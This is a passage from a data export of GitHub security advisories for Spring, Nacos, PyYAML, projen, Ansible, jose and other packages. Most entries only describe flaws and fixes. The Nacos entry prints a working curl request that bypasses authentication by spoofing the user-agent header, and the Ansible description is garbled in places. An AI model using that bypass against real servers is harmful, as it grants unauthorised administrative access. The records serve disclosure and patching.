'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework:spring-framework-bom'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.2.0'}, {'fixed': '5.2.9'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.2.8'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework:spring-framework-bom'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.0'}, {'fixed': '5.1.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.1.17'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework:spring-framework-bom'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.19'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.0.18'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework:spring-framework-bom'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.3.29'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5421'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1c679c43fa4f7846d748a937955c7921436d1b315445978254442163@%3Ccommits.ambari.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1eccdbd7986618a7319ee7a533bd9d9bf6e8678e59dd4cca9b5b2d7a@%3Cissues.ambari.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3589ed0d18edeb79028615080d5a0e8878856436bb91774a3196d9eb@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r503e64b43a57fd68229cac4a869d1a9a2eac9e75f8719cad3a840211@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5c95eff679dfc642e9e4ab5ac6d202248a59cb1e9457cfbe8b729ac5@%3Cissues.ambari.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7e6a213eea7f04fc6d9e3bd6eb8d68c4df92a22e956e95cb2c482865@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8b496b1743d128e6861ee0ed3c3c48cc56c505b38f84fa5baf7ae33a@%3Cdev.ambari.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r918caad55dcc640a16753b00d8d6acb90b4e36de4b6156d0867246ec@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9f13cccb214495e14648d2c9b8f2c6072fd5219e74502dd35ede81e1@%3Cdev.ambari.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra889d95141059c6cbe77dd80249bb488ae53b274b5f3abad09d9511d@%3Cuser.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raf7ca57033e537e4f9d7df7f192fa6968c1e49409b2348e08d807ccb@%3Cuser.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb18ed999153ef0f0cb7af03efe0046c42c7242fd77fbd884a75ecfdc@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc9efaf6db98bee19db1bc911d0fa442287dac5cb229d4aaa08b6a13d@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd462a8b0dfab4c15e67c0672cd3c211ecd0e4f018f824082ed54f665@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re014a49d77f038ba70e5e9934d400af6653e8c9ac110d32b1254127e@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf00d8f4101a1c1ea4de6ea1e09ddf7472cfd306745c90d6da87ae074@%3Cdev.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210513-0009/'}, {'type': 'WEB', 'url': 'https://tanzu.vmware.com/security/cve-2020-5421'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-35'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-27T21:06:49Z', 'nvd_published_at': '2020-09-19T04:15:00Z'}" +1.4.0,GHSA-36hp-jr8h-556f,2021-05-10T14:56:08Z,2021-04-27T20:09:17Z,,['CVE-2021-29441'],Authentication Bypass,"When configured to use authentication (`-Dnacos.core.auth.enabled=true`) Nacos uses the `AuthFilter` servlet filter to enforce authentication. This filter has a [backdoor](https://github.com/alibaba/nacos/blob/5fa05aef52f7432aeab19fe53035431b9d8c91d9/core/src/main/java/com/alibaba/nacos/core/auth/AuthFilter.java#L78-L81) that enables Nacos servers to bypass this filter and therefore skip authentication checks. This mechanism relies on the `user-agent` HTTP header so it can be easily spoofed. + +The following request to the `configuration` endpoint gets rejected as we are not providing any credentials: +``` +❯ curl -X POST ""http://127.0.0.1:8848/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld"" +{""timestamp"":""2020-12-02T14:33:57.154+0000"",""status"":403,""error"":""Forbidden"",""message"":""unknown user!"",""path"":""/nacos/v1/cs/configs""} +``` + +However the following one gets accepted by using the `Nacos-Server` user-agent header: +``` +❯ curl -X POST -A Nacos-Server ""http://127.0.0.1:8848/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld"" +true +``` + +#### Impact + +This issue may allow any user to carry out any administrative tasks on the Nacos server.",[],"[{'package': {'ecosystem': 'Maven', 'name': 'com.alibaba.nacos:nacos-common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29441'}, {'type': 'WEB', 'url': 'https://github.com/alibaba/nacos/issues/4701'}, {'type': 'WEB', 'url': 'https://github.com/alibaba/nacos/pull/4703'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-36hp-jr8h-556f'}]","{'cwe_ids': ['CWE-290'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-27T20:08:38Z', 'nvd_published_at': '2021-04-27T21:15:00Z'}" +1.4.0,GHSA-3pqx-4fqf-j49f,2022-01-04T19:49:51Z,2021-04-20T16:40:42Z,,['CVE-2019-20477'],Deserialization of Untrusted Data in PyYAML,"PyYAML 5.1 through 5.1.2 has insufficient restrictions on the load and load_all functions because of a class deserialization issue, e.g., Popen is a class in the subprocess module. NOTE: this issue exists because of an incomplete fix for CVE-2017-18342.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pyyaml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1'}, {'fixed': '5.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-20477'}, {'type': 'PACKAGE', 'url': 'https://github.com/yaml/pyyaml'}, {'type': 'WEB', 'url': 'https://github.com/yaml/pyyaml/blob/master/CHANGES'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/33VBUY73AA6CTTYL3LRWHNFDULV7PFPN/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/52N5XS73Z5S4ZN7I7R56ICCPCTKCUV4H/'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/download/47655'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-08T19:24:04Z', 'nvd_published_at': '2020-02-19T04:15:00Z'}" +1.4.0,GHSA-gg2g-m5wc-vccq,2021-04-16T22:53:30Z,2021-04-06T18:36:40Z,,['CVE-2021-21423'],Rebuild-bot workflow may allow unauthorised repository modifications,"### Impact + +`projen` is a project generation tool that synthesizes project configuration files such as `package.json`, `tsconfig.json`, `.gitignore`, GitHub Workflows, `eslint`, `jest`, and more, from a well-typed definition written in JavaScript. Users of projen's `NodeProject` project type (including any project type derived from it) include a `.github/workflows/rebuild-bot.yml` workflow that may allow any GitHub user to trigger execution of un-trusted code in the context of the ""main"" repository (as opposed to that of a fork). In some situations, such untrusted code may potentially be able to commit to the ""main"" repository. + +The rebuild-bot workflow is triggered by comments including `@projen rebuild` on pull-request to trigger a re-build of the projen project, and updating the pull request with the updated files. This workflow is triggered by an `issue_comment` event, and thus always executes with a `GITHUB_TOKEN` belonging to the repository into which the pull-request is made (this is in contrast with workflows triggered by `pull_request` events, which always execute with a `GITHUB_TOKEN` belonging to the repository from which the pull-request is made). + +Repositories that do not have branch protection configured on their default branch (typically `main` or `master`) could possibly allow an untrusted user to gain access to secrets configured on the repository (such as NPM tokens, etc). Branch protection prohibits this escalation, as the managed `GITHUB_TOKEN` would not be able to modify the contents of a protected branch and affected workflows must be defined on the default branch. + +### Patches + +The issue was mitigated in version `0.16.41` of the `projen` tool, which removes the `issue_comment` trigger from this workflow. Version `0.17.0` of projen completely removes the `rebuild-bot.yml` workflow. + +### Workarounds + +The recommended way to address the vulnerability is to upgrade `projen`. Users who cannot upgrade `projen` may also remove the `.github/workflows/rebuild-bot.yml` file and add it to their `.gitignore` file (via `projenrc.js`) to mitigate the issue. + +### References + +The `rebuild-bot.yml` workflow managed by `projen` is only one occurrence of a GitHub Workflows mis-configuration, but it may also be present in other workflows not managed by `projen` (either hand-written, or managed by other tools). For more information on this class of issues, the [Keeping your GitHub Actions and workflows secure: Preventing pwn requests][1] article provides a great overview of the problem. + + +[1]: https://securitylab.github.com/research/github-actions-preventing-pwn-requests","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'projen'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.6.0'}, {'fixed': '0.16.41'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/projen/projen/security/advisories/GHSA-gg2g-m5wc-vccq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21423'}, {'type': 'WEB', 'url': 'https://github.com/projen/projen/commit/36030c6a4b1acd0054673322612e7c70e9446643'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/projen'}]","{'cwe_ids': ['CWE-527'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T18:36:19Z', 'nvd_published_at': '2021-04-06T19:15:00Z'}" +1.4.0,GHSA-77g3-3j5w-64w4,2021-08-31T21:10:36Z,2021-04-07T20:36:46Z,,['CVE-2020-10685'],Exposure of Resource to Wrong Sphere and Insecure Temporary File in Ansible,"A flaw was found in Ansible Engine affecting Ansible Engine versions 2.7.x before 2.7.17 and 2.8.x before 2.8.11 and 2.9.x before 2.9.7 as well as Ansible Tower before and including versions 3.4.5 and 3.5.5 and 3.6.3 when using modules which decrypts vault files such as assemble, script, unarchive, win_copy, aws_s3 or copy modules. The temporary directory is created in /tmp leaves the s ts unencrypted. On Operating Systems which /tmp is not a tmpfs but part of the root partition, the directory is only cleared on boot and the decryp emains when the host is switched off. The system will be vulnerable when the system is not running. So decrypted data must be cleared as soon as possible and the data which normally is encrypted ble.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.17'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.11'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10685'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/pull/68433'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10685'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible/ansible'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202006-11'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4950'}]","{'cwe_ids': ['CWE-377', 'CWE-459', 'CWE-668'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T14:11:30Z', 'nvd_published_at': '2020-05-11T14:15:00Z'}" +1.4.0,GHSA-7fjp-g4m7-fx23,2021-04-12T20:05:57Z,2021-04-13T15:12:26Z,,[],User (Encrypted) Password Field Being Serialised,"### Impact +Leaking Password field during serialisation of the User model. Password is in the encrypted form but if User model is requested in json or array form the value is printed. + +### Patches +Issue has been patched in version 0.3.7-beta and onwards. + +### Workarounds +Add the 'password' field to the Users model file in the hidden array: + +```php + + /** + * The attributes that should be hidden for arrays. + * + * @var array + */ + protected $hidden = [ + 'remember_token', + 'password', + ]; +``` + + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [pwweb/laravel-core](https://github.com/pwweb/laravel-core) +* Email us at [security@pw-websolutions.com](mailto:security@pw-websolutions.com)",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'pwweb/laravel-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.7-beta'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.3.6-beta'}}]","[{'type': 'WEB', 'url': 'https://github.com/pwweb/laravel-core/security/advisories/GHSA-7fjp-g4m7-fx23'}]","{'cwe_ids': ['CWE-200'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-04-12T20:05:57Z', 'nvd_published_at': None}" +1.4.0,GHSA-f7vx-j8mp-3h2x,2021-03-29T22:11:05Z,2021-04-13T15:18:01Z,,['CVE-2019-17636'],Insufficient Verification of Data Authenticity in Eclipse Theia,"In Eclipse Theia versions 0.3.9 through 0.15.0, one of the default pre-packaged Theia extensions is ""Mini-Browser"", published as ""@theia/mini-browser"" on npmjs.com. This extension, for its own needs, exposes a HTTP endpoint that allows to read the content of files on the hosts filesystem, given their path, without restrictions on the requesters origin. This design is vulnerable to being exploited remotely through a DNS rebinding attack or a drive-by download of a carefully crafted exploit.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@theia/mini-browser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.9'}, {'fixed': '0.16.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-17636'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-theia/theia/pull/7205'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-theia/theia/commit/b212d07f915df1509180944ee3132714bc2636bf'}, {'type': 'WEB', 'url': 'https://bugs.eclipse.org/bugs/show_bug.cgi?id=551747'}]","{'cwe_ids': ['CWE-345'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-29T22:11:05Z', 'nvd_published_at': '2020-03-10T15:15:00Z'}" +1.4.0,GHSA-45w5-pvr8-4rh5,2021-03-26T22:09:16Z,2021-04-13T15:19:14Z,,['CVE-2021-26275'],Command injection in eslint-fixer,The eslint-fixer package through 0.1.5 for Node.js allows command injection via shell metacharacters to the fix function. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. The ozum/eslint-fixer GitHub repository has been intentionally deleted.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'eslint-fixer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26275'}, {'type': 'WEB', 'url': 'https://advisory.checkmarx.net/advisory/CX-2021-4774'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/eslint-fixer'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-26T22:09:16Z', 'nvd_published_at': '2021-03-19T00:15:00Z'}" +1.4.0,GHSA-rmp7-f2vp-3rq4,2023-08-30T22:09:23Z,2021-04-20T16:31:54Z,,['CVE-2021-25925'],Cross-site scripting in SiCKRAGE,"in SiCKRAGE, versions 4.2.0 to 10.0.11.dev1 are vulnerable to Stored Cross-Site-Scripting (XSS) due to user input not being validated properly when processed by the server. Therefore, an attacker can inject arbitrary JavaScript code inside the application, and possibly steal a user’s sensitive information.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'sickrage'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '10.0.11.dev2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.0.11.dev1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25925'}, {'type': 'WEB', 'url': 'https://github.com/SiCKRAGE/SiCKRAGE/commit/9f42426727e16609ad3d1337f6637588b8ed28e4'}, {'type': 'PACKAGE', 'url': 'https://github.com/SiCKRAGE/SiCKRAGE'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25925'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-13T20:56:03Z', 'nvd_published_at': '2021-04-12T14:15:00Z'}" +1.4.0,GHSA-43ch-2h55-2vj7,2021-03-29T21:49:55Z,2021-04-13T15:18:17Z,,['CVE-2020-28360'],Server-Side Request Forgery in private-ip,"Insufficient RegEx in private-ip npm package v1.0.5 and below insufficiently filters reserved IP ranges resulting in indeterminate SSRF. An attacker can perform a large range of requests to ARIN reserved IP ranges, resulting in an indeterminable number of critical attack vectors, allowing remote attackers to request server-side resources or potentially execute arbitrary code through various SSRF techniques.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'private-ip'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28360'}, {'type': 'WEB', 'url': 'https://github.com/frenchbread/private-ip/commit/840664c4b9ba7888c41cfee9666e9a593db133e9'}, {'type': 'WEB', 'url': 'https://github.com/frenchbread/private-ip'}, {'type': 'WEB', 'url': 'https://johnjhacking.com/blog/cve-2020-28360/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/private-ip'}]","{'cwe_ids': ['CWE-918'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-29T21:49:55Z', 'nvd_published_at': '2020-11-23T21:15:00Z'}" +1.4.0,GHSA-h73g-8g27-xxcx,2021-04-08T21:59:12Z,2021-04-13T15:22:58Z,,['CVE-2020-28439'],Command injection in corenlp-js-prefab,This affects all versions of package corenlp-js-prefab. The injection point is located in line 10 in 'index.js.' It depends on a vulnerable package 'corenlp-js-interface.',"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'corenlp-js-prefab'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28439'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CORENLPJSPREFAB-1050434'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-08T21:59:12Z', 'nvd_published_at': '2020-12-11T17:15:00Z'}" +1.4.0,GHSA-836c-xg97-8p4h,2023-08-07T13:07:47Z,2021-04-30T17:34:48Z,,['CVE-2020-27197'],libtaxii Server-Side Request Forgery vulnerability,"""TAXII libtaxii through 1.1.117, as used in EclecticIQ OpenTAXII through 0.2.0 and other products, allows SSRF via an initial http:// substring to the parse method, even when the no_network setting is used for the XML parser. NOTE: the vendor points out that the parse method ""wraps the lxml library"" and that this may be an issue to ""raise ... to the lxml group.""""","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'libtaxii'}, 'ecosystem_specific': {'affected_functions': ['libtaxii.common.parse']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.118'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-27197'}, {'type': 'WEB', 'url': 'https://github.com/TAXIIProject/libtaxii/issues/246'}, {'type': 'WEB', 'url': 'https://github.com/eclecticiq/OpenTAXII/issues/176'}, {'type': 'WEB', 'url': 'https://github.com/TAXIIProject/libtaxii/pull/247'}, {'type': 'WEB', 'url': 'https://github.com/TAXIIProject/libtaxii/commit/23c6f7b69d99e965c8d53dc4710ae64da3fb4842'}, {'type': 'PACKAGE', 'url': 'https://github.com/TAXIIProject/libtaxii'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/159662/Libtaxii-1.1.117-OpenTaxi-0.2.0-Server-Side-Request-Forgery.html'}]","{'cwe_ids': ['CWE-918'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T17:53:43Z', 'nvd_published_at': '2020-10-17T20:15:00Z'}" +1.4.0,GHSA-qfxv-qqvg-24pg,2021-03-29T22:57:19Z,2021-04-13T15:17:36Z,,['CVE-2019-10788'],OS Command Injection in im-metadata,"im-metadata through 3.0.1 allows remote attackers to execute arbitrary commands via the ""exec"" argument. It is possible to inject arbitrary commands as part of the metadata options which is given to the ""exec"" function.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'im-metadata'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10788'}, {'type': 'WEB', 'url': 'https://github.com/Turistforeningen/node-im-metadata/commit/ea15dddbe0f65694bfde36b78dd488e90f246639'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-IMMETADATA-544184'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-29T22:57:19Z', 'nvd_published_at': '2020-02-04T21:15:00Z'}" +1.4.0,GHSA-vwfx-hh3w-fj99,2021-03-31T17:35:42Z,2021-04-06T17:24:14Z,,['CVE-2021-21418'],Potential XSS injection in the newsletter conditions field,"### Impact +An employee can inject javascript in the newsletter condition field that will then be executed on the front office + +### Patches +The issue has been fixed in 2.6.1","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/ps_emailsubscription'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/ps_emailsubscription/security/advisories/GHSA-vwfx-hh3w-fj99'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21418'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/ps_emailsubscription/commit/664ffb225e2afb4a32640bbedad667dc6e660b70'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/ps_emailsubscription/releases/tag/v2.6.1'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/prestashop/ps_emailsubscription'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T17:35:42Z', 'nvd_published_at': '2021-03-31T18:15:00Z'}" +1.4.0,GHSA-75xc-qvxh-27f8,2021-04-16T23:15:02Z,2021-04-19T14:51:06Z,,['CVE-2021-31403'],Timing side channel vulnerability in UIDL request handler in Vaadin 7 and 8,"Non-constant-time comparison of CSRF tokens in UIDL request handler in `com.vaadin:vaadin-server` versions 7.0.0 through 7.7.23 (Vaadin 7.0.0 through 7.7.23), and 8.0.0 through 8.12.2 (Vaadin 8.0.0 through 8.12.2) allows attacker to guess a security token via timing attack + +- https://vaadin.com/security/cve-2021-31403","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.7.24'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.12.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.7.24'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.12.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/framework/security/advisories/GHSA-75xc-qvxh-27f8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31403'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/framework/pull/12188'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/framework/pull/12190'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31403'}]","{'cwe_ids': ['CWE-203', 'CWE-208'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:15:02Z', 'nvd_published_at': '2021-04-23T16:15:00Z'}" +1.4.0,GHSA-58f5-hfqc-jgch,2021-04-16T23:01:38Z,2021-04-19T14:57:22Z,,['CVE-2021-29443'],Padding Oracle Attack due to Observable Timing Discrepancy in jose,"jose is an npm library providing a number of cryptographic operations. +### Impact + +[AES_CBC_HMAC_SHA2 Algorithm](https://tools.ietf.org/html/rfc7518#section-5.2) (A128CBC-HS256, A192CBC-HS384, A256CBC-HS512) decryption would always execute both HMAC tag verification and CBC decryption, if either failed `JWEDecryptionFailed` would be thrown. But a possibly observable difference in timing when padding error would occur while decrypting the ciphertext makes a padding oracle and an adversary might be able to make use of that oracle to decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). + +### Patches + +All major release versions have had a patch released which ensures the HMAC tag is verified before performing CBC decryption. The fixed versions are `^1.28.1 || ^2.0.5 || >=3.11.4`. + +Users should upgrade their v1.x dependency to [`^1.28.1`](https://github.com/panva/jose/releases/tag/v1.28.1), their v2.x dependency to [`^2.0.5`](https://github.com/panva/jose/releases/tag/v2.0.5), and their v3.x dependency to [`^3.11.4`](https://github.com/panva/jose/releases/tag/v3.11.4) + +### Credits +Thanks to Morgan Brown of Microsoft for bringing this up and Eva Sarafianou (@esarafianou) for helping to score this advisory.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jose'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.28.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'jose'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': 